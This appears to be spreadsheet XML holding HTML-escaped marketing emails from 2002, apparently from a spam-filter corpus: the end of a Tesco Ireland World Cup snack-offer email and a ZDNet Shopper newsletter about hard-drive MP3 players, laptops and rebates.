               &lt;div align="center"&gt;&lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/4_products.jpg" width="484" height="191" alt="Pringles, Twix, Hula Hoops and Club Orange"&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width="100%" border="0" cellspacing="1" cellpadding="0"&gt;
           &lt;tr&gt; 
             &lt;td width="98%"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Pringles 
               Large Tubes 200g. Was &amp;euro;2.05 each. &lt;font color="#CC0033"&gt;&lt;a href="http://195.200.172.1/I?X=79c1a930104dde94cd97caf48e70510e" &gt;Now 
               buy 2 for &amp;euro;3.00&lt;/a&gt;&lt;font size="1"&gt;*&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td width="98%"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Twix 
               9 pack. Was &amp;euro;1.99. &lt;a href="http://195.200.172.1/I?X=79c1a930104dde944fd6d1bdd02f2791" &gt;Now 
               buy 1 get 2nd half price&lt;/a&gt;&lt;font color="#CC0033" size="1"&gt;*&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td width="98%"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Hula 
               Hoops Minis Tub140g. Was &amp;euro;2.42. &lt;a href="http://195.200.172.1/I?X=79c1a930104dde94fca3a8633aee73e1" &gt;Now 
               buy one get 2nd half price&lt;/a&gt;&lt;font color="#CC0033" size="1"&gt;*&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td width="98%"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Club 
               Twin Packs 2x2 litre. Was &amp;euro;3.10 each. &lt;a href="http://195.200.172.1/I?X=79c1a930104dde94903b5fd0c2eff6a6" &gt;Now 
               buy 1 get 2nd half price&lt;/a&gt;&lt;font color="#CC0033" size="1"&gt;*&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
           &lt;tr&gt;
             &lt;td&gt;&lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/spacer.gif" width="490" height="10"&gt;&lt;br&gt;
               &lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;To take 
               advantage of these fantastic World Cup offers click here&lt;br&gt;
               &lt;a href="http://195.200.172.1/I?X=79c1a930104dde94b6b7d2d3511a8b34" &gt;http://www.tesco.ie/superstore 
               &lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
           &lt;tr&gt;
             &lt;td&gt; 
               &lt;p&gt;&lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/spacer.gif" width="490" height="10"&gt;&lt;br&gt;
                 &lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/offer_band.gif" width="490" height="29" alt="*Offer ends June 9th. You can't miss it."&gt;&lt;br&gt;
                 &lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/spacer.gif" width="490" height="10"&gt;&lt;br&gt;
                 &lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Why 
                 not get everyone behind our boys and send this email on to a friend 
                 so they can enjoy these great offers too?&lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Because 
                 we&amp;#146;re selling cases at cost-price we can only offer a maximum 
                 of 6 cases of Guinness and 6 cases of Budweiser per household.&lt;br&gt;
                 &lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/spacer.gif" width="490" height="10"&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;table width="500" border="0" cellspacing="0" cellpadding="0"&gt;
     &lt;tr&gt; 
       &lt;td valign="middle" width="121"&gt;&lt;img src="http://tesco-mail.realtime.co.uk/ireland/Y00616/clubcard.gif" width="120" height="57" alt="Tesco Ireland Clubcard"&gt;&lt;/td&gt;
       &lt;td valign="middle" width="395"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Remember 
         you earn Clubcard points on every purchase&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;table width="500" border="0" cellspacing="0" cellpadding="6"&gt;
     &lt;tr&gt;
       &lt;td&gt;
         &lt;p&gt;&lt;font size="1" face="Verdana, Arial, Helvetica, sans-serif"&gt;All products 
           are subject to availability while stocks last.&lt;/font&gt;&lt;/p&gt;
         &lt;p&gt;&lt;font size="1" face="Verdana, Arial, Helvetica, sans-serif"&gt;Online 
           prices may vary from those charged in-store.&lt;/font&gt;&lt;/p&gt;
         &lt;p&gt;&lt;font size="1" face="Verdana, Arial, Helvetica, sans-serif"&gt;Prices 
           in this email are correct at the time of production and are subject 
           to change. Please see website for latest prices.&lt;br&gt;
           &lt;/font&gt;&lt;/p&gt;
         &lt;p&gt;&lt;font size="1" face="Verdana, Arial, Helvetica, sans-serif"&gt;If you 
           would prefer not to receive emails with news and special offers from 
           Tesco.ie, please click here: &lt;br&gt;&lt;a href="http://www.tesco.ie/register/unsubscribe.asp?from=yyyy@spamassassin.taint.org" &gt;http://www.tesco.ie/register/unsubscribe.asp?from=yyyy@spamassassin.taint.org&lt;/a&gt;&lt;br&gt;
           &lt;/font&gt;&lt;/p&gt;
         &lt;p&gt;&lt;font size="1" face="Verdana, Arial, Helvetica, sans-serif"&gt;This may 
           take up to five working days to unsubscribe.&lt;/font&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;IMG SRC="http://195.200.172.1/S?e35064f2c92adaa2-A-63609-65024" BORDER="0" ALT=""&gt;&lt;/body&gt;
 &lt;/html&gt;
 --1715101671.1022782885778.JavaMail.root.smtp4--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Take all your music on the road (ZDNET SHOPPER)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Buyer's Alert | July 12, 2002&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;body style="margin:8px 9px 9px 12px" bgcolor="#ffffff" background="http://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link="#003399" alink="#cc0000" vlink="#666699"&gt; 
 &lt;CENTER&gt;&lt;A name=top&gt;&lt;/A&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 bgColor=#232850 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=bottom&gt;
     &lt;TD width=440 colSpan=4&gt;&lt;IMG height=60 alt="ZDNet Buyers Alert Newsletter" 
       src="http://www.cnet.com/i/sh/nl/hd_buyers_alert.gif" width=440&gt;&lt;/TD&gt;
     &lt;TD vAlign=top align=middle width=160 bgColor=#ffffff rowSpan=2&gt;&lt;!-- ad --&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2766" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2766"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /ad --&gt;&lt;!-- rebates --&gt;
 &lt;br&gt;&lt;img src="http://www.cnet.com/i/nl/zd-ba/rebates.gif" width=160 height=18 alt="Rebates"&gt;&lt;br&gt;
 &lt;table width=160 bgcolor="#eeeeee" cellpadding=5 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-2"&gt;When ordering, make sure the reseller/manufacturer 
 provides the rebate coupon you need.
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires July 5, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58w5n5X5pw1xmYgHobjqmeR" &gt;$50 off Cidco Mailstation with subscription&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires July 31, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIzY4jw1gvKNXLTSyPWc3PR" &gt;Get a car cassette adapter and power adapter FREE with Rio Volt SP250&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires August 31, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcnXbM-2ysxoLkkTKhn-dR" &gt;$20 off SideWinder Strategic Commander&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires September 30, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX2czbRaR6fez6pa6cIJuR" &gt;$20 off Rio 600 64MB&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZSNaA-EntRYG8Y0gSPZxsR" &gt;$20 off Nike PSA (120)&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J1Q0DzV5ckUMBXB6W5WWlR" &gt;$20 off RioVolt SP90&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;font face="arial, helvetica" size="-2"&gt;Expires March 3, 2003&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMQJbP5EvqHSCN0U7nQUD4R" &gt;$10 off Microsoft Natural Keyboard Pro PS2/USB&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;!-- top 5 --&gt;&lt;IMG 
       height=18 alt="ZDNet Top 5 Products" src="http://www.cnet.com/i/sh/nl/top5.gif" 
       width=160&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=2 cellPadding=0 width=160 bgColor=#eeeeee border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD colSpan=4&gt;&lt;!--&lt;IMG height=3 src="http://www.cnet.com/i/sh/nl/b.gif" 
             width=1&gt;&lt;BR&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&amp;nbsp; &lt;IMG alt="" 
             src="e50520011112_files/rhc_digitalcameras.gif" border=0&gt;--&gt; &lt;b&gt;&lt;FONT face="arial, helvetica" size=-1&gt;Notebooks&lt;/font&gt;&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD rowSpan=5&gt;&amp;nbsp;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=15&gt;&lt;FONT face="arial, helvetica" 
           size=-1&gt;&lt;B&gt;1.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
  &lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKTqPTdCnsAE64qDAwrPGrR" &gt;&lt;B&gt;Gateway 600XL&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 size=-2&gt;Premier merchant:&lt;BR&gt;
 		&lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOzdKm3YnLMKE-nFr99H2iR" &gt;CDW $399&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD rowSpan=5&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;2.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWd3KTg1zzGZP85eXsJh-PR" &gt;&lt;B&gt;Dell Inspiron 2600 series&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 size=-2&gt;Premier 
             merchant:&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwjRBwMYmCs3CyJqsjeorR" &gt;buy.com $445&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;3.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFUrr_KLGg3F-erCpGY9iR" &gt;&lt;B&gt;Dell SmartStep 100N&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 size=-2&gt;Premier merchant:&lt;BR&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQF77BOjD2Rl28NRQSnqQPR" &gt;buy.com $649&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;4.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6jNY3v9DDFWVhZSgRXBnR" &gt;&lt;B&gt;Toshiba Satellite 5105-S607&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 
             size=-2&gt;Premier merchant:&lt;BR&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZH12j93NoOiJGu_NEsnEuR" &gt;CDW $499&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;5.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=5c-BnjPIZnPbrYQt1a53xlZk0f-IosR" &gt;&lt;B&gt;Toshiba Satellite 2400-S251&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 
             size=-2&gt;Premier merchant:&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZcfBlxdszqwuBXvl3NU2FR" &gt;Dell $1,467&lt;/A&gt; &lt;BR&gt;--&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJonyAeZ9kSjaeTldfVpf4R" &gt;More Top 
             Selling Products...&lt;/A&gt;&lt;/B&gt;&lt;/B&gt;&lt;BR&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
     &lt;TD vAlign=bottom width=12 colSpan=3&gt;&lt;IMG height=6 
       src="http://www.cnet.com/i/sh/nl/gl_corner2.gif" width=12&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;!-- intro --&gt;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width=428 bgColor=#ffffff&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=428 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=10&gt;&lt;/TD&gt;
           &lt;TD width=410&gt;&lt;BR&gt;
             &lt;TABLE cellSpacing=0 cellPadding=0 width=410 border=0&gt;
               &lt;TBODY&gt;
               &lt;TR vAlign=top&gt;
                 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;FONT color=#333333 
                   size=2&gt;&lt;B&gt;Dear Reader,&lt;BR&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
 Hard-drive-based MP3 players, which allow you to store massive 
 amounts of MP3s and other files on a portable device, have been 
 around for a few years. But recently, three new players have 
 taken the concept to a new high with impressive advancements 
 in design, functionality, and interface. Each has its unique 
 strong points, but they're all groundbreaking in their own way. 
 Check out our hands-on reviews.
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanyk_ym1o1lXdIl9Oi-UiyR" &gt;Apple iPod (10GB)&lt;/a&gt; 
 &lt;li&gt;Lowest price: $479
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0dz-PQLYMr9i_f_B0NLnlR" &gt;Creative Labs Nomad Jukebox 3&lt;/a&gt; 
 &lt;li&gt;Lowest price: $345
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLKgZZ_xzkWdT_pfmeDx04R" &gt;SONICblue Rio Riot&lt;/a&gt; 
 &lt;li&gt;Lowest price: $277
 &lt;br&gt;&lt;br&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
           &lt;TD width=8&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
         width=8&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- new products--&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=420 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=30 alt="Feature: New Products" 
             src="http://www.cnet.com/i/sh/nl/sub_new.gif" width=395&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=100&gt;&lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEK6LDggNAvpmtTwxp6DtrR" &gt;&lt;IMG height=100 src="http://www.zdnet.com/products/graphics/pid/551509.jpg" width=130 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=300&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=f0-nv_DQWg4K4NnCun2fqfAgMcXeaiR" &gt;&lt;B&gt;iRiver SlimX iMP-350&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;This is the thinnest MP3 CD player we've seen, and its antiskip protection and extra features make it a pleasure to use.&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=05-gDULIG8WRwtnNHsfnODtxI8fiiPR" &gt;&lt;FONT 
             color=#990000 size=-2&gt;Read Review&lt;/FONT&gt;&lt;/A&gt; &lt;FONT color=#990000 
             size=-2&gt;|&lt;/FONT&gt; &lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXH6MJGYAHd5q0_HZB17WnR" &gt;&lt;FONT color=#990000 size=-2&gt;Check Prices&lt;/FONT&gt;&lt;/A&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=4&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=100&gt;&lt;a href="http://clickthru.online.com/Click?q=2f-hYaFIqnzA6EAjfBP26D_8gaZjMeR" &gt;&lt;IMG height=100 hspace=10 src="http://www.zdnet.com/products/graphics/pid/561166.jpg" width=130 
             border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=300&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtYwDoh7-EMLKlXBDgnVsR" &gt;&lt;B&gt;Adobe Photoshop 7.0&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;If you're an advanced photographer and don't have Photoshop yet or if you need natural paint tools, version 7.0 is a must-have; otherwise, version 6.0 will do the trick.&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0IMbc6KKW24YOLpk6Td6dR" &gt;&lt;FONT 
             color=#990000 size=-2&gt;Read Review&lt;/FONT&gt;&lt;/A&gt; &lt;FONT color=#990000 
             size=-2&gt;|&lt;/FONT&gt; &lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOLAbH1NWZV3RXvLF34ULXuR" &gt;&lt;FONT color=#990000 size=-2&gt;Check Prices&lt;/FONT&gt;&lt;/A&gt; 
       &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- ad --&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=395 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=10&gt;&lt;/TD&gt;
           &lt;TD width=385 bgColor=#c0c0c0&gt;&lt;IMG height=1 
             src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;FONT 
       face="arial, helvetica" size=-1&gt;&lt;BR&gt;&lt;/FONT&gt;
       &lt;CENTER&gt;&lt;IMG height=10 alt=Advertisement 
       src="http://www.cnet.com/i/sh/nl/ad10-dk.gif" width=120&gt;&lt;/CENTER&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR vAlign=center&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD align=right width=75&gt;&lt;IMG alt="" hspace=15 
             src="http://www.cnet.com/i/sh/nl/5421_zdnet_image.jpg" align=middle 
           order="0"&gt;&lt;br&gt;&lt;br&gt;&lt;/TD&gt;
 		  &lt;TD vAlign=top width=300&gt;&lt;FONT face="verdana, helvetica" 
             size=-2&gt;&lt;BR&gt;
 &lt;a href="http://clickthru.online.com/Click?q=84-CCOyQ60TyzYdAghZsihsBSWgp7yR" &gt;Get Double Memory FREE, Plus Big Savings on Select Systems!&lt;/A&gt;&lt;br&gt;Buy select Dell&amp;#8482; systems and get Double Memory FREE! PLUS save up to $400! Offer ends soon. Small business only. Click for details.&lt;br&gt;&lt;/td&gt;
   &lt;!--&lt;TR vAlign=center&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD align=right width=75&gt;&lt;IMG alt="" hspace=15 
             src="http://www.cnet.com/i/sh/nl/8474systems.gif" align=middle 
           order="0"&gt;&lt;br&gt;&lt;br&gt;&lt;/TD&gt;
 		  &lt;TD vAlign=top width=300&gt;&lt;FONT face="verdana, helvetica" 
             size=-2&gt;&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdTjIubvHf2H3f2jvrqULlR" &gt;$50K-a-day Giveaway from Dell Home Systems&amp;#8230;&lt;/A&gt;&lt;br&gt;Buy any new Dell Home System on or before July 31, 2002 and you'll be automatically entered to win $50,000. The next lucky winner could be you!&lt;br&gt;&lt;/td&gt; 		  
 &lt;tr valign=middle&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=75 align=right&gt;&lt;img src="http://www.cnet.com/i/sh/nl/hp_inks2.jpg" width="98" height="82" border="0" hspace="20" align="bottom" alt=""&gt;&lt;/td&gt;
 &lt;td width=300 height="50" valign="top"&gt;&lt;font face="verdana, helvetica" size="-2"&gt;&lt;BR&gt;
 Canon inkjet cartridges start at $2.00!&lt;BR&gt;
 Epson inkjet cartridges start at $4.00!&lt;BR&gt;
 HP inkjet cartridges start at $15.00!&lt;BR&gt;
 Toners start at just $17.00!&lt;BR&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ae-jOE6QMB1LksG10O8-mhe2RYEVu4R" &gt;http://www.voltexx.com&lt;/a&gt;
 &lt;/FONT&gt;&lt;/TD&gt;--&gt;&lt;/TR&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- steals and deals --&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=420 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=410&gt;&lt;IMG height=30 alt="Steals and Deals" 
             src="http://www.cnet.com/i/sh/nl/sub_steals.gif" width=395&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;FONT size=-2&gt;Please note 
             that prices fluctuate and may have changed since the sending of this 
             newsletter. Lowest prices listed are usually after rebates (but 
             please check with the reseller, sometimes the rebate is included in 
             their price). &lt;BR&gt;&lt;/FONT&gt;
             &lt;P&gt;&lt;B&gt;Compaq iPaq H3635&lt;/B&gt;&lt;BR&gt;Price recently dropped 11%&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLx-_6nL26Z5znP-FdWuurR" &gt;
 			Lowest price: $550&lt;/A&gt; 
             &lt;P&gt;&lt;B&gt;Audiovox DV1680 DVD&lt;/B&gt;&lt;BR&gt;Price recently dropped 20%&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPwBYj0qVnie23s1N87hJlR" &gt;
 			Lowest price: $399&lt;/A&gt;&lt;BR&gt;
             &lt;P&gt;&lt;B&gt;Creative Labs Nomad Jukebox 6GB&lt;/B&gt;&lt;BR&gt;Price recently dropped 10%&lt;br&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDkHnC689q0QzbMuLbLad4R" &gt;
 			Lowest price: $149&lt;font face="Arial"&gt;&lt;/A&gt; &lt;BR&gt;&lt;br&gt;
 			&lt;BR&gt;&lt;BR&gt;&lt;U&gt;&lt;B&gt;SPECIAL FEATURE&lt;/B&gt;&lt;/U&gt;&lt;BR&gt;&lt;br&gt;Did you know that CNET ChannelOnline enables your sales team to 
 view pricing and product availability in real time?
 &lt;P&gt;
 ChannelOnline's Quote &amp; Procure displays up-to-the-minute pricing 
 and availability from multiple distributors - so you can get your
 customers what they need, when they need it.
 &lt;P&gt;
 You'll be able to:
 &lt;li&gt;View data from your select distributors
 &lt;li&gt;Compare negotiated pricing for all your distributors
 &lt;li&gt;Determine which SKUs are available at your suppliers' warehouses
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rzzA30otZhKQcaLlAI6OrR" &gt;&lt;B&gt;Tell me more about Quote &amp; Procure&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;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width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- Thin grey line --&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=top&gt;
     &lt;TD width=1 bgColor=#83A3CB rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=10 bgColor=#1E5C99 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=1 
